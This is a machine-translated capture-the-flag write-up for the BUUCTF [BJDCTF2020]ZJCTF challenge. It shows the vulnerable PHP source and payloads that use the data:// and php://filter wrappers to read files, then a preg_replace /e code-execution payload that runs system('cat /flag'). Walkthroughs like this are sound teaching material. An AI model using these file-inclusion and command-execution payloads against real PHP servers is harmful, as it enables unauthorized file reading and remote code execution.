Buuctf-[bjdctf2020]zjctf, but so (xiaoyute detailed explanation)

buuctf-[BJDCTF2020]ZJCTF, nothing more than this （ Xiaoyute detailed explanation ）

Open questions ：

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
    
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    
    highlight_file(__FILE__);
}
?>

By analyzing the code ,get Pass in two parameters text and file,text Parameter utilization file_get_contents() The function opens as read-only , After opening, the content should be consistent with "I have a dream" String matches , To execute the following file contains $file Parameters .
See with file_get_contents() Function on text Parameters , And the following files contain functions , Naturally think of php In pseudo protocol data:// For agreement filter Read the agreement next.php Source code
payload：

index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    
    echo complex($re, $str). "\n";
}

function getFlag(){
    
	@eval($_GET['cmd']);
}

Here we use base64 decode

Here is preg_replace/e Code execution problem in mode

from https://xz.aliyun.com/t/2557 Learning related issues

I won't go into details here

It's used here \S*=${}

structure payload

next.php?\S*=${
    getFlag()}&cmd=system('cat /flag');